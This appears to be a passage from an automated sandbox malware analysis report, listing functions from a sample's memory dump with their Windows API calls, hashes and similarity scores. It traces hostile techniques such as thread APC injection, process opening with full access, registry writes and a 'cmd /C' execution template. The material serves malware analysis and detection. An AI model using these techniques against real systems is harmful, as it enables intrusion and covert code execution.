  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAF14, Relevance: 7.7, APIs: 5, Instructions: 174 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8B4E, Relevance: 7.6, APIs: 5, Instructions: 125 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C45F0, Relevance: 7.6, APIs: 5, Instructions: 121 Total matches: 58memoryregistrysynchronization
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7878, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C439B, Relevance: 7.6, APIs: 5, Instructions: 98 Total matches: 56timememory
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9F0B, Relevance: 7.6, APIs: 5, Instructions: 95 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C44E2, Relevance: 7.6, APIs: 5, Instructions: 90 Total matches: 117synchronization
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAD95, Relevance: 7.6, APIs: 5, Instructions: 85 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC4E7, Relevance: 7.6, APIs: 5, Instructions: 81 Total matches: 95
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB410, Relevance: 7.6, APIs: 5, Instructions: 74 Total matches: 26thread
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6D18, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C848E, Relevance: 7.6, APIs: 5, Instructions: 67 Total matches: 56memorysynchronization
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C11B3, Relevance: 7.6, APIs: 5, Instructions: 65 Total matches: 61filememory
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
